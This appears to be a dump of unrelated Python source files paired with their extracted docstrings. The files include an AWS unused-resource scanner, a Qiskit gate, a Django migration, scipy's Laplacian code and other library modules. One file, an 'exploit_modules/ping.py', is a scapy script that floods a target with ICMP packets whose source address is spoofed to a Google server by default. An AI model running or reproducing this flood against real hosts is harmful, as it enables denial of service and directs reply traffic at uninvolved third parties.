except:
print("Exception occurred while creating processes. Please try again later!")
quit()
if jobs:
for process in jobs:
try:
process.join()
except:
print("Exception occurred while joining processes. Please try again later!")
quit()
os.chdir('./aws_logs')
writer = pd.ExcelWriter('unused_resources.xlsx')
all_files = glob.glob("*.csv")
for f in all_files:
df = pd.read_csv(f)
df.to_excel(writer,sheet_name=f.split('.')[0], index=False)
writer.save()
for f in all_files:
os.remove(f)
print("Completed account scan")
# Updating Resource Count Object
unused_resource_details.update({ 'AWS::EC2::Volume': unused_resource_count[ebs_volume],
'AWS::EC2::EIP': unused_resource_count[elastic_ip],
'AWS::EC2::NetworkInterface': unused_resource_count[network_interface],
'AWS::EC2::VPC': unused_resource_count[vpc],
'AWS::EC2::Subnet': unused_resource_count[subnet],
'AWS::EC2::SecurityGroup': unused_resource_count[security_group],
'AWS::ElasticLoadBalancing::LoadBalancer': unused_resource_count[classic_loadbalancer],
'AWS::ElasticLoadBalancingV2::LoadBalancer': unused_resource_count[app_nw_gateway_loadbalancer],
'AWS::IAM::User': unused_resource_count[iam_user],
'AWS::IAM::Group': unused_resource_count[iam_group]
})
# Showing Resource Distribution
print("\nUnused Resources in the Account:")
unused_resource_count = 0
for key, value in sorted(unused_resource_details.items(), key=lambda x: x[1], reverse=True):
if value != 0:
print("\t{} : {}".format(key, value))
unused_resource_count+=value
print("\n\nSummary:")
print("\tTotal Unused Resources:", unused_resource_count)
print("\n\nDetailed unused resource information can be found at: aws_logs/unused_resources.xlsx")
if(__name__ == '__main__'):
arg_parser = argparse.ArgumentParser(prog='unused_aws_resources',
usage='%(prog)s [options]',
description='Count AWS resources')
# Add the arguments
arg_parser.add_argument('--accessKey',
type=str,
required=True,
help='AWS Access Key')
arg_parser.add_argument('--secretKey',
type=str,
required=True,
help='AWS Secret Key')
# Execute the parse_args() method
args = arg_parser.parse_args()
main(args)
| unused_aws_resources.py | 21,740 | SYNOPSIS
--------
Get the details of unused resources present across regions in the AWS account
DESCRIPTION
-----------
This script provides a detailed overview of the number of unused resources present in the AWS account.
It provides service-wise details of unused resources lying around in all the regions of the AWS account.
PREREQUISITES
-------------
- Workstation with Python version 3 and above
- AWS python-based SDK: boto3
Installation command: pip3 install boto3
- pandas framework and openpyxl for reporting operations (xlsx file).
Installation command(s):
- pip3 install pandas
- pip3 install openpyxl
- User credentials (Access Key Id and Secret Accces Key) of a user having atleast the Security Audit permission and above on the AWS account
EXAMPLE
-------
This script can be executed on a python compiler (AWS Cloudshell, Powershell, bash, any command line tool with python installed)
Command: python ./unused_aws_resources.py --accessKey <AWS Access Key Id> --secretKey <AWS Secret Access Key>
OUTPUT
------
- The script will provide a summarized count of all unused resources in the account.
- For a detailed view, the user can refer to the .xlsx file that will be generated by the script.
Updating Resource Count Object Showing Resource Distribution Add the arguments Execute the parse_args() method | 1,447 | en | 0.73123 |
import os
from ....modules.utils.config_utils import get_yaml_config
str2yaml = {
"gat": "gat.yaml",
"gcn": "gcn.yaml",
"ggnn": "ggnn.yaml",
"graphsage": "graphsage.yaml",
}
dir_path = os.path.dirname(os.path.realpath(__file__))
def get_graph_embedding_args(graph_embedding_name):
"""
It will build the template for ``GNNBase`` model.
Parameters
----------
graph_embedding_name: str
The graph embedding name. Expected in ["gcn", "gat", "graphsage", "ggnn"].
If it can't find the ``graph_embedding_name``, it will return ``{}``.
Returns
-------
template_dict: dict
The template dict.
The structure is shown as follows:
{
graph_embedding_share: {num_layers: 1, input_size: 300, ...},
graph_embedding_private: {heads: [1], attn_drop: 0.0}
}
The ``graph_embedding_share`` contains the parameters shared by all ``GNNBase`` models.
The ``graph_embedding_private`` contains the parameters specifically in each \
graph_embedding methods.
"""
if graph_embedding_name in str2yaml.keys():
yaml_name = str2yaml[graph_embedding_name]
path = os.path.join(dir_path, yaml_name)
config = get_yaml_config(path)
return config
else:
return {}
__all__ = ["get_graph_embedding_args"]
| graph4nlp/pytorch/modules/config/graph_embedding/__init__.py | 1,373 | It will build the template for ``GNNBase`` model.
Parameters
----------
graph_embedding_name: str
The graph embedding name. Expected in ["gcn", "gat", "graphsage", "ggnn"].
If it can't find the ``graph_embedding_name``, it will return ``{}``.
Returns
-------
template_dict: dict
The template dict.
The structure is shown as follows:
{
graph_embedding_share: {num_layers: 1, input_size: 300, ...},
graph_embedding_private: {heads: [1], attn_drop: 0.0}
}
The ``graph_embedding_share`` contains the parameters shared by all ``GNNBase`` models.
The ``graph_embedding_private`` contains the parameters specifically in each graph_embedding methods. | 702 | en | 0.597779 |
import numpy as np
from skimage import io as ios
import PySimpleGUI as sg
import warnings
import m_specfun as m_fun
def select_lines(infile, contrast, lines, res_dict, fits_dict, wloc, outfil):
"""
displays new window with image infile + start + 'fit
a rectangle around the selected line can be selected with dragging the mouse
:param infile: filebase of image
:param contrast: brightness of image
:param lines: list of calibration wavelengths
:param res_dict: dictionary
:param fits_dict: "
:param wloc: location of displayed window for selection
:param outfil: filename without extension (.txt) with results of line selection
:return:
x0, y0: center coordinates of selected rectangle (int)
dx, dy: half width and height of selected rectangle (int)
"""
def fitgaussimage(image, xy0, dxy, lam):
x0 = xy0[0]
y0 = xy0[1]
dx = dxy[0]
dy = dxy[1]
print(x0, y0, dx, dy)
data = image[y0 - dy:y0 + dy, x0 - dx:x0 + dx] # x - y reversed
params, success = m_fun.fit_gaussian_2d(data)
if success in [1, 2, 3, 4]:
(height, x, y, width_x, width_y) = params # x and y reversed
width_x = 2 * np.sqrt(2 * np.log(2)) * np.abs(width_x) # FWHM
width_y = 2 * np.sqrt(2 * np.log(2)) * np.abs(width_y) # FWHM
x = x + y0 - dy # y and x reversed
y = y + x0 - dx
xyw = (y, x, width_y, width_x, lam) # x - y changed back
return xyw
else:
return 0, 0, 0, 0, 0
xyl = []
dxy = [10, 10]
i = i_plot = 0
im, header = m_fun.get_fits_image(infile)
if len(im.shape) == 3:
imbw = np.sum(im, axis=2) # used for fitgaussian(data)
else:
imbw = im
# (ymax, xmax) = im.shape
# print (xmax,ymax)
m_fun.get_fits_keys(header, fits_dict, res_dict, keyprint=False)
# #===================================================================
# new rect_plt
# first get size of graph from tmp.png and size of image
# graph coordinates are in image pixels!
(imy, imx) = im.shape[:2]
image_file = 'tmp.png' # scaled image
imrescale = np.flipud(ios.imread(image_file)) # get shape
(canvasy, canvasx) = imrescale.shape[:2]
wlocw = (wloc[0], wloc[1])
image_elem_sel = [sg.Graph(canvas_size=(canvasx, canvasy), graph_bottom_left=(0, 0),
graph_top_right=(imx, imy), key='-GRAPH-', change_submits=True, drag_submits=True)]
layout_select = [[sg.Ok(), sg.Cancel(), sg.Button('Skip Line'), sg.Button('Finish'),
sg.Button('I'), sg.Button('D'), sg.Text(infile, size=(30, 1)),
sg.Text(key='info', size=(40, 1))], image_elem_sel]
winselect = sg.Window(f'select rectangle for fit size, click lines',
layout_select, finalize=True, location=wlocw,
keep_on_top=True, no_titlebar=False, resizable=True,
disable_close=False, disable_minimize=True, element_padding=(2, 2))
# get the graph element for ease of use later
graph = winselect['-GRAPH-'] # type: sg.Graph
# initialize interactive graphics
winselect_active = True
img = graph.draw_image(image_file, location=(0, imy))
dragging = False
start_point = end_point = prior_rect = None
index = 0
icircle = itext = None
color = 'yellow'
while winselect_active:
event, values = winselect.read()
if event == "-GRAPH-": # if there's a "Graph" event, then it's a mouse
x, y = (values["-GRAPH-"])
if not dragging:
start_point = (x, y)
dragging = True
else:
end_point = (x, y)
if prior_rect:
graph.delete_figure(prior_rect)
if None not in (start_point, end_point):
prior_rect = graph.draw_rectangle(start_point,
end_point, line_color='red')
elif event is not None and event.endswith('+UP'):
# The drawing has ended because mouse up
xy0 = [int(0.5 * (start_point[0] + end_point[0])),
int(0.5 * (start_point[1] + end_point[1]))]
size = (abs(start_point[0] - end_point[0]),
abs(start_point[1] - end_point[1]))
info = winselect["info"]
info.update(value=f"grabbed rectangle at {xy0} with size {size}")
start_point, end_point = None, None # enable grabbing a new rect
dragging = False
if min(size[0], size[1]) > 2: # rectangle
info.update(value=f"rectangle at {xy0} with size {size}")
dxy = size
elif i < len(lines):
if prior_rect:
graph.delete_figure(prior_rect)
print(xy0, lines[i])
xyw = (fitgaussimage(imbw, xy0, dxy, lines[i]))
if xyw[0]: # successful fit
if 0 < xyw[0] < imx and 0 < xyw[1] < imy:
print(np.float16(xyw))
xyl.append(np.float32(xyw))
# Draw the click just made
r = (xyw[2] + xyw[3])/4
icircle = graph.DrawCircle((xyw[0], xyw[1]), r, line_color=color, line_width=3)
itext = graph.DrawText(' ' + str(lines[i]), location=(xyw[0], xyw[1]), color=color,
font=('Arial', 12), angle=45, text_location=sg.TEXT_LOCATION_BOTTOM_LEFT)
info.update(value=f"line {lines[i]} at {np.float16(xyw)}")
graph.update()
i += 1
i_plot += 1
else:
info.update(value='bad fit, try again')
print('bad fit, try again')
else:
info.update(value='Fit not successful, try again')
print('Fit not successful, try again')
else:
info.update(value='all lines measured, press OK or Cancel')
elif event == 'Ok':
if np.array(xyl).shape[0] > 1:
# minimum of two lines needed for fit
xyl = np.array(xyl, dtype=np.float32) # for ordered output
with open(m_fun.change_extension(outfil, '.txt'), 'ab+') as f:
np.savetxt(f, xyl, fmt='%8.2f', header=str(index) + ' ' + str(infile) + '.fit')
np.savetxt(f, np.zeros((1, 5)), fmt='%8.2f')
index += 1
color = 'red' if color == 'yellow' else 'yellow' # alternate colors for spectra
elif icircle:
graph.delete_figure(icircle) # last point
graph.delete_figure(itext)
graph.update()
xyl = []
i = i_plot = 0
elif event == 'Cancel':
for ind in range(i_plot):
xyl = np.array(xyl, dtype=np.float32) # for ordered output
rsq2 = (xyl[ind, 2] + xyl[ind, 3])/5.6
drag_figures = graph.get_figures_at_location((xyl[ind, 0] + rsq2, xyl[ind, 1] + rsq2))
for figure in drag_figures:
if figure != img:
graph.delete_figure(figure)
graph.update()
xyl = []
i = i_plot = 0
elif event == 'Skip Line':
i += 1 # do not increment iplot!
elif event in ('I', 'D'):
if event == 'I':
contrast *= 2
else:
contrast /= 2
im_tmp = imrescale / np.max(imrescale) * 255 * contrast
im_tmp = np.clip(im_tmp, 0.0, 255)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
ios.imsave(image_file, np.flipud(im_tmp).astype(np.uint8))
graph.delete_figure(img)
img = graph.draw_image(image_file, location=(0, imy))
graph.send_figure_to_back(img)
elif event in ('Finish', None):
if event == 'Finish':
with open(outfil + '.txt', 'ab+') as f:
np.savetxt(f, np.zeros((1, 5)), fmt='%8.2f')
(x, y) = winselect.current_location()
wlocw = (x, y)
winselect.close()
return wlocw
| myselect.py | 8,658 | displays new window with image infile + start + 'fit
a rectangle around the selected line can be selected with dragging the mouse
:param infile: filebase of image
:param contrast: brightness of image
:param lines: list of calibration wavelengths
:param res_dict: dictionary
:param fits_dict: "
:param wloc: location of displayed window for selection
:param outfil: filename without extension (.txt) with results of line selection
:return:
x0, y0: center coordinates of selected rectangle (int)
dx, dy: half width and height of selected rectangle (int)
x - y reversed x and y reversed FWHM FWHM y and x reversed x - y changed back used for fitgaussian(data) (ymax, xmax) = im.shape print (xmax,ymax) =================================================================== new rect_plt first get size of graph from tmp.png and size of image graph coordinates are in image pixels! scaled image get shape get the graph element for ease of use later type: sg.Graph initialize interactive graphics if there's a "Graph" event, then it's a mouse The drawing has ended because mouse up enable grabbing a new rect rectangle successful fit Draw the click just made minimum of two lines needed for fit for ordered output alternate colors for spectra last point for ordered output do not increment iplot! | 1,289 | en | 0.784972 |
# -*- coding: utf-8 -*-
# Copyright 2017 IBM RESEARCH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""
Pauli X (bit-flip) gate.
Author: Andrew Cross
"""
from qiskit import QuantumRegister
from qiskit import QuantumCircuit
from qiskit import Gate
from qiskit import CompositeGate
from qiskit import InstructionSet
from qiskit.extensions.standard import header
class XGate(Gate):
"""Pauli X (bit-flip) gate."""
def __init__(self, qubit, circ=None):
"""Create new X gate."""
super(XGate, self).__init__("x", [], [qubit], circ)
def qasm(self):
"""Return OPENQASM string."""
qubit = self.arg[0]
return self._qasmif("x %s[%d];" % (qubit[0].name, qubit[1]))
def inverse(self):
"""Invert this gate."""
return self # self-inverse
def reapply(self, circ):
"""Reapply this gate to corresponding qubits in circ."""
self._modifiers(circ.x(self.arg[0]))
def x(self, q):
"""Apply X to q."""
if isinstance(q, QuantumRegister):
gs = InstructionSet()
for j in range(q.size):
gs.add(self.x((q, j)))
return gs
else:
self._check_qubit(q)
return self._attach(XGate(q, self))
QuantumCircuit.x = x
CompositeGate.x = x
| qiskit/extensions/standard/x.py | 1,932 | Pauli X (bit-flip) gate.
Create new X gate.
Invert this gate.
Return OPENQASM string.
Reapply this gate to corresponding qubits in circ.
Apply X to q.
Pauli X (bit-flip) gate.
Author: Andrew Cross
-*- coding: utf-8 -*- Copyright 2017 IBM RESEARCH. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================= self-inverse | 884 | en | 0.803278 |
# coding: utf-8
# Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ScheduleSecretDeletionDetails(object):
"""
Details for scheduling the deletion of the specified secret.
"""
def __init__(self, **kwargs):
"""
Initializes a new ScheduleSecretDeletionDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param time_of_deletion:
The value to assign to the time_of_deletion property of this ScheduleSecretDeletionDetails.
:type time_of_deletion: datetime
"""
self.swagger_types = {
'time_of_deletion': 'datetime'
}
self.attribute_map = {
'time_of_deletion': 'timeOfDeletion'
}
self._time_of_deletion = None
@property
def time_of_deletion(self):
"""
Gets the time_of_deletion of this ScheduleSecretDeletionDetails.
An optional property indicating when to delete the secret version, expressed in `RFC 3339`__ timestamp format.
__ https://tools.ietf.org/html/rfc3339
:return: The time_of_deletion of this ScheduleSecretDeletionDetails.
:rtype: datetime
"""
return self._time_of_deletion
@time_of_deletion.setter
def time_of_deletion(self, time_of_deletion):
"""
Sets the time_of_deletion of this ScheduleSecretDeletionDetails.
An optional property indicating when to delete the secret version, expressed in `RFC 3339`__ timestamp format.
__ https://tools.ietf.org/html/rfc3339
:param time_of_deletion: The time_of_deletion of this ScheduleSecretDeletionDetails.
:type: datetime
"""
self._time_of_deletion = time_of_deletion
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| darling_ansible/python_venv/lib/python3.7/site-packages/oci/vault/models/schedule_secret_deletion_details.py | 2,549 | Details for scheduling the deletion of the specified secret.
Initializes a new ScheduleSecretDeletionDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param time_of_deletion:
The value to assign to the time_of_deletion property of this ScheduleSecretDeletionDetails.
:type time_of_deletion: datetime
Gets the time_of_deletion of this ScheduleSecretDeletionDetails.
An optional property indicating when to delete the secret version, expressed in `RFC 3339`__ timestamp format.
__ https://tools.ietf.org/html/rfc3339
:return: The time_of_deletion of this ScheduleSecretDeletionDetails.
:rtype: datetime
Sets the time_of_deletion of this ScheduleSecretDeletionDetails.
An optional property indicating when to delete the secret version, expressed in `RFC 3339`__ timestamp format.
__ https://tools.ietf.org/html/rfc3339
:param time_of_deletion: The time_of_deletion of this ScheduleSecretDeletionDetails.
:type: datetime
coding: utf-8 Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved. This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. noqa: F401 | 1,378 | en | 0.776249 |
# Generated by Django 2.0.4 on 2018-04-20 09:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('daily_tracker', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='attandance',
name='enter_at',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='attandance',
name='out_at',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='attandance',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL),
),
]
| office_tracker/daily_tracker/migrations/0002_auto_20180420_0946.py | 897 | Generated by Django 2.0.4 on 2018-04-20 09:46 | 45 | en | 0.67918 |
"""
Copyright (c) 2017, Syslog777
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Desktop nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from scapy.all import *
class Ping:
def __init__(self, parser):
parser.add_argument('-f', "--flood", action="store_true")
parser.add_argument("--src", nargs="?", default="172.217.12.110",
help="Source IP address for IP layer of ICMP packet\n"
"Default source address: google server")
try:
self.args = parser.parse_args()
if not (self.args.ping):
print("Host required!")
parser.print_help()
sys.exit(1)
except BaseException:
parser.print_help()
sys.exit(1)
self.host = self.args.ping
self.src = self.args.src
self.flood = self.args.flood
def ping(self):
network_layer = IP(src=self.src, dst=self.host)
packet = network_layer / ICMP(code=8)
print("Ping host at {} from {}".format(self.host, self.src))
send(packet)
def flood_(self):
print("\n###########################################")
print("# Starting ICMP/Ping Flood attack...")
print("###########################################\n")
for src in range(1, 254):
# build the packet
network_layer = IP(src=self.src, dst=self.host)
packet = network_layer / ICMP(code=8)
send(packet)
def execute(self):
if self.flood:
self.flood_()
elif self.ping:
self.ping()
| psak_src/psak_src/exploit_modules/ping.py | 3,034 | Copyright (c) 2017, Syslog777
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Desktop nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
build the packet | 1,522 | en | 0.89263 |
import os
import pyconll
from ufal.udpipe import Model, Pipeline, ProcessingError
class UDPipeToken:
def __init__(self, ud_token, upos=None, tags=None):
self.id = ud_token.id
self.form = ud_token.form
self.upos = ud_token.upos if upos is None else upos
self.lemma = ud_token.lemma
self.tags = [(k + '=' + list(vx)[0]) for k, vx in ud_token.feats.items()] if tags is None else list(tags)
self.deprel = ud_token.deprel
self.head = ud_token.head
def __repr__(self):
return self.form
class UdpipeParser:
def __init__(self):
self.model = None
self.pipeline = None
self.error = None
def load(self, model_path):
if os.path.isfile(model_path):
udp_model_file = model_path
else:
udp_model_file = os.path.join(model_path, 'udpipe_syntagrus.model')
self.model = Model.load(udp_model_file)
self.pipeline = Pipeline(self.model, 'tokenize', Pipeline.DEFAULT, Pipeline.DEFAULT, 'conllu')
self.error = ProcessingError()
def parse_text(self, text):
parsings = []
processed = self.pipeline.process(text, self.error)
if self.error.occurred():
return None
try:
for parsing0 in pyconll.load_from_string(processed):
parsing = []
for token in parsing0:
utoken = token.form.lower()
if utoken in ['чтоб']:
# Исправляем ошибки разметки некоторых слов в UDPipe.Syntagrus
parsing.append(UDPipeToken(token, upos='SCONJ', tags=[]))
elif utoken in ['средь']:
parsing.append(UDPipeToken(token, upos='ADP', tags=[]))
else:
parsing.append(UDPipeToken(token))
parsings.append(parsing)
except:
return None
return parsings
| py/generative_poetry/udpipe_parser.py | 2,024 | Исправляем ошибки разметки некоторых слов в UDPipe.Syntagrus | 60 | ru | 0.92086 |
"""
Laplacian of a compressed-sparse graph
"""
# Authors: Aric Hagberg <hagberg@lanl.gov>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Jake Vanderplas <vanderplas@astro.washington.edu>
# License: BSD
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.sparse import isspmatrix, coo_matrix
###############################################################################
# Graph laplacian
def laplacian(csgraph, normed=False, return_diag=False):
""" Return the Laplacian matrix of a directed graph.
For non-symmetric graphs the out-degree is used in the computation.
Parameters
----------
csgraph : array_like or sparse matrix, 2 dimensions
compressed-sparse graph, with shape (N, N).
normed : bool, optional
If True, then compute normalized Laplacian.
return_diag : bool, optional
If True, then return diagonal as well as laplacian.
Returns
-------
lap : ndarray
The N x N laplacian matrix of graph.
diag : ndarray
The length-N diagonal of the laplacian matrix.
diag is returned only if return_diag is True.
Notes
-----
The Laplacian matrix of a graph is sometimes referred to as the
"Kirchoff matrix" or the "admittance matrix", and is useful in many
parts of spectral graph theory. In particular, the eigen-decomposition
of the laplacian matrix can give insight into many properties of the graph.
For non-symmetric directed graphs, the laplacian is computed using the
out-degree of each node.
Examples
--------
>>> from scipy.sparse import csgraph
>>> G = np.arange(5) * np.arange(5)[:, np.newaxis]
>>> G
array([[ 0, 0, 0, 0, 0],
[ 0, 1, 2, 3, 4],
[ 0, 2, 4, 6, 8],
[ 0, 3, 6, 9, 12],
[ 0, 4, 8, 12, 16]])
>>> csgraph.laplacian(G, normed=False)
array([[ 0, 0, 0, 0, 0],
[ 0, 9, -2, -3, -4],
[ 0, -2, 16, -6, -8],
[ 0, -3, -6, 21, -12],
[ 0, -4, -8, -12, 24]])
"""
if csgraph.ndim != 2 or csgraph.shape[0] != csgraph.shape[1]:
raise ValueError('csgraph must be a square matrix or array')
if normed and (np.issubdtype(csgraph.dtype, np.int)
or np.issubdtype(csgraph.dtype, np.uint)):
csgraph = csgraph.astype(np.float)
if isspmatrix(csgraph):
return _laplacian_sparse(csgraph, normed=normed,
return_diag=return_diag)
else:
return _laplacian_dense(csgraph, normed=normed,
return_diag=return_diag)
def _laplacian_sparse(graph, normed=False, return_diag=False):
n_nodes = graph.shape[0]
if not graph.format == 'coo':
lap = (-graph).tocoo()
else:
lap = -graph.copy()
diag_mask = (lap.row == lap.col)
if not diag_mask.sum() == n_nodes:
# The sparsity pattern of the matrix has holes on the diagonal,
# we need to fix that
diag_idx = lap.row[diag_mask]
diagonal_holes = list(set(range(n_nodes)).difference(
diag_idx))
new_data = np.concatenate([lap.data, np.ones(len(diagonal_holes))])
new_row = np.concatenate([lap.row, diagonal_holes])
new_col = np.concatenate([lap.col, diagonal_holes])
lap = coo_matrix((new_data, (new_row, new_col)), shape=lap.shape)
diag_mask = (lap.row == lap.col)
lap.data[diag_mask] = 0
w = -np.asarray(lap.sum(axis=1)).squeeze()
if normed:
w = np.sqrt(w)
w_zeros = (w == 0)
w[w_zeros] = 1
lap.data /= w[lap.row]
lap.data /= w[lap.col]
lap.data[diag_mask] = (1 - w_zeros[lap.row[diag_mask]]).astype(lap.data.dtype)
else:
lap.data[diag_mask] = w[lap.row[diag_mask]]
if return_diag:
return lap, w
return lap
def _laplacian_dense(graph, normed=False, return_diag=False):
n_nodes = graph.shape[0]
lap = -np.asarray(graph) # minus sign leads to a copy
# set diagonal to zero
lap.flat[::n_nodes + 1] = 0
w = -lap.sum(axis=0)
if normed:
w = np.sqrt(w)
w_zeros = (w == 0)
w[w_zeros] = 1
lap /= w
lap /= w[:, np.newaxis]
lap.flat[::n_nodes + 1] = 1 - w_zeros
else:
lap.flat[::n_nodes + 1] = w
if return_diag:
return lap, w
return lap
| docker_version/resources/usr/local/lib/python2.7/dist-packages/scipy/sparse/csgraph/_laplacian.py | 4,487 | Return the Laplacian matrix of a directed graph.
For non-symmetric graphs the out-degree is used in the computation.
Parameters
----------
csgraph : array_like or sparse matrix, 2 dimensions
compressed-sparse graph, with shape (N, N).
normed : bool, optional
If True, then compute normalized Laplacian.
return_diag : bool, optional
If True, then return diagonal as well as laplacian.
Returns
-------
lap : ndarray
The N x N laplacian matrix of graph.
diag : ndarray
The length-N diagonal of the laplacian matrix.
diag is returned only if return_diag is True.
Notes
-----
The Laplacian matrix of a graph is sometimes referred to as the
"Kirchoff matrix" or the "admittance matrix", and is useful in many
parts of spectral graph theory. In particular, the eigen-decomposition
of the laplacian matrix can give insight into many properties of the graph.
For non-symmetric directed graphs, the laplacian is computed using the
out-degree of each node.
Examples
--------
>>> from scipy.sparse import csgraph
>>> G = np.arange(5) * np.arange(5)[:, np.newaxis]
>>> G
array([[ 0, 0, 0, 0, 0],
[ 0, 1, 2, 3, 4],
[ 0, 2, 4, 6, 8],
[ 0, 3, 6, 9, 12],
[ 0, 4, 8, 12, 16]])
>>> csgraph.laplacian(G, normed=False)
array([[ 0, 0, 0, 0, 0],
[ 0, 9, -2, -3, -4],
[ 0, -2, 16, -6, -8],
[ 0, -3, -6, 21, -12],
[ 0, -4, -8, -12, 24]])
Laplacian of a compressed-sparse graph
Authors: Aric Hagberg <hagberg@lanl.gov> Gael Varoquaux <gael.varoquaux@normalesup.org> Jake Vanderplas <vanderplas@astro.washington.edu> License: BSD Graph laplacian The sparsity pattern of the matrix has holes on the diagonal, we need to fix that minus sign leads to a copy set diagonal to zero | 1,800 | en | 0.744554 |
"""
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cloudcafe.events.models.base import EventBaseModel, EventBaseListModel
class Bandwidth(EventBaseModel):
"""Bandwidth Response Model
@summary: Response model for bandwidth from a compute
event notification
@note: Although the 'public' and 'private' interfaces are
not required, they are the most common names, and are
included as optional attributes for the sake of convenience
@note: This type may contain additional unspecified
BandwidthInterface fields, which will be captured in a
dictionary called kwargs
JSON Example:
{
"private": { <BandwidthInterface> },
"public": { <BandwidthInterface> }
}
"""
kwarg_map = {'private': 'private',
'public': 'public'}
optional_kwargs = ['private', 'public']
strict_checking = False
def __init__(self, private=None, public=None, **kwargs):
super(Bandwidth, self).__init__(locals())
@classmethod
def _dict_to_obj(cls, json_dict):
"""Override dict_to_obj implementation"""
obj = cls._map_values_to_kwargs(json_dict)
for key in obj.kwargs:
obj.kwargs[key] = BandwidthInterface._dict_to_obj(obj.kwargs[key])
if obj.private:
obj.private = BandwidthInterface._dict_to_obj(obj.private)
if obj.public:
obj.public = BandwidthInterface._dict_to_obj(obj.public)
return obj
class BandwidthInterface(EventBaseModel):
"""Bandwidth Interface Response Model
@summary: Response model for bandwidth on an interface from
a compute event notification
@note: Sub-model of Bandwidth
JSON Example:
{
"bw_in": 123456,
"bw_out": 654321
}
"""
